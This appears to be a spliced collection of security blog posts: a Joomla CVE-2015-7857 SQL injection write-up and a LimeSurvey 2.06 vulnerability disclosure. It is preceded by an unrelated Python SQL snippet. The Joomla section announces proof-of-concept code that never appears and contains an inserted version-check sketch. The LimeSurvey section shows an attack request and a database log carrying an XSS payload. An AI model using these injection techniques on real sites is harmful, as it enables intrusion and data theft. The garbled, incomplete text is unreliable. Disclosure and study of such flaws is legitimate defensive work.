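        FROM person p JOIN ancestors a ON p.id = a.parent_id
    )
    SELECT name FROM ancestors
""").fetchall()
print([r[0] for r in rows])  # ['child', 'parent', 'grandparent']
```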
          Joomla CVE-2015-7857 writeup         
(I wrote this as a 'note' on 14.12.2015, but since all the information is already public,
below you will find a proof of concept and a little write-up for the vulnerability described in this CVE.)

A few weeks ago Asaf Orpani found a SQL injection vulnerability in the (at the time) latest Joomla CMS.
According to the CVE, versions 3.2 through 3.4 are vulnerable.

Because I was involved in other projects, I only found out about this CVE a few days ago... When I saw that Asaf had published more details about possible exploitation (beyond the CVE), I wondered
whether I would be able to write a small proof-of-concept to use later during other projects.

So, let's get to work!

Trustwave SpiderLabs mentioned that:

„CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.”

Cool. ;]

I think you will find all the technical details described on the SpiderLabs Blog, so there is no point copying and pasting them here again.

All we actually need is one screenshot from Trustwave's blog: the one with the GET request.
From it we can see that exploitation boils down to a simple one-liner GET. We will use
Python for this. ;)

Let's write a small web client (a GET request based on the urllib2 library).
Our goal: type an IP/hostname, hit enter, and get the DB version. ;)

This case will be a little different from the one described on SpiderLabs' blog, because we don't want to wait for an admin to log in. We don't need a logged-in admin on the webapp/server during our pentest. ;P

Our proof-of-concept payload will inject a simple "version()" into the SQL query
when a user visits a link with the 'list[select]' parameter. On my localhost server we
will use a LAMP stack (on Debian 8) and Joomla 3.4.4.

By the way, it is good to know whether a Joomla instance found in our 'testing scope' is vulnerable or not.

I assume that you have already installed Joomla (3.4.4).
If not, unzip it and find out where (if anywhere) we can find information
about the version:

$ grep --color -nr -e 3.4.4 ./

Below is a sample screenshot showing the matching strings:

Now we can see a nice XML file containing the version of Joomla installed on my box.
(It is worth mentioning that this file can be grabbed by anyone; you don't need
any credentials.)

So let's add a few lines to our 'one-liner' Python script to check whether the tested Joomla
is vulnerable. Sample code would look like this:
As you can see, the sqli(host) function is now commented out in the code; we only
want to see the version number. (Checking whether your Joomla installation exposes this file
is left as an exercise for the reader.)
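A minimal sketch of that version check (written in Python 3 instead of the post's urllib2; the manifest path and helper names are my assumptions based on the screenshots described above):

```python
import urllib.request
import xml.etree.ElementTree as ET

# Path of the world-readable manifest observed in the post (assumption).
MANIFEST_PATH = "/administrator/manifests/files/joomla.xml"

def parse_version(xml_text):
    # Return the text of the top-level <version> element, if present.
    root = ET.fromstring(xml_text)
    tag = root.find("version")
    return tag.text if tag is not None else None

def joomla_version(base_url):
    # Fetch the manifest (no credentials needed) and extract the version.
    with urllib.request.urlopen(base_url.rstrip("/") + MANIFEST_PATH) as resp:
        return parse_version(resp.read())
```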

Joomla 3... SQL Injection
I tried this PoC against 3.2, 3.3 and 3.4.4 installed on my box and, to be honest,
I was only able to use it against 3.4. (If you want, let me know in the comments
which installed versions this PoC worked against on your box. Thanks! ;))

Modified version of this code is below:

Below is a screenshot of testing the vulnerable Joomla 3.4.4 installed on my localhost,
using a simple PoC to get the version of MySQL available on the server:

          New version of Lime Survey         
As far as I know, LimeSurvey has already been updated, so below you will find all the vulnerabilities I found nearly two months ago during some small 'code review' exercises.

The response from the LimeSurvey team was very fast! :)

Found: 4.11.2015
Sent:    5.11.2015
Resp:   5.11.2015

AFAIK all findings were fixed in 48h. So... here we go:

Title        : LimeSurvey 2.06 - Multiple vulnerabilities
Version   : stable-release-limesurvey206plus-build151018.zip
Found     : 04.11.2015



    All the vulnerabilities described here were found in the admin section.

    Case I ------------ SQL Injection in "searchcondition"
    Case II ----------- XSS in "page"
    Case III ---------- XSS in "filterbea"
    Case IV ---------- Information disclosure a.k.a. 'method enumeration'
    Case V ----------- XSS in "templatename"

    Case VI ---------- XSS in "lang" 

CASE I: SQL Injection in "searchcondition"

POST /limesurvey/index.php/admin/participants/sa/getParticipantsResults_json HTTP/1.1
X-Requested-With: XMLHttpRequest
Content-Length: 192
Cookie: PHPSESSID=vmu9d3vriajf213m0u7lmdbl36; YII_CSRF_TOKEN=c36af5a641de36a66bc377f9e85a84b81e234ff0
Connection: close
Pragma: no-cache
Cache-Control: no-cache



After enabling logs in MySQL, we can find:


151104  8:55:13    71 Connect   root@localhost on limesurvey
                   71 Query     SET NAMES 'utf8'
                   71 Query     SELECT * FROM `lime_settings_global` `t`
                   71 Query     SELECT * FROM `lime_plugins` `t` WHERE `t`.`active`=1
                   71 Query     SELECT * FROM `lime_permissions` `t` WHERE `t`.`entity_id`=0 AND `t`.`entity`='global' AND `t`.`uid`=1 AND `t`.`permission`='superadmin' LIMIT 1
                   71 Query     SELECT * FROM `lime_participant_attribute_names` `t` WHERE visible = 'TRUE'
                   71 Query     SELECT `lime_participant_attribute_names`.* FROM `lime_participant_attribute_names`
ORDER BY `lime_participant_attribute_names`.`attribute_id`
                   71 Query     SELECT count(*) as cnt FROM `lime_participants` `p` left join lime_users luser
                   ON luser.uid=p.owner_uid WHERE ('>"><body/onload=alert(123123)> = 'a')
                   71 Quit


The response on the web should look similar to this one (btw: the one below is, of course, for a different payload):


<h1>Internal Server Error</h1>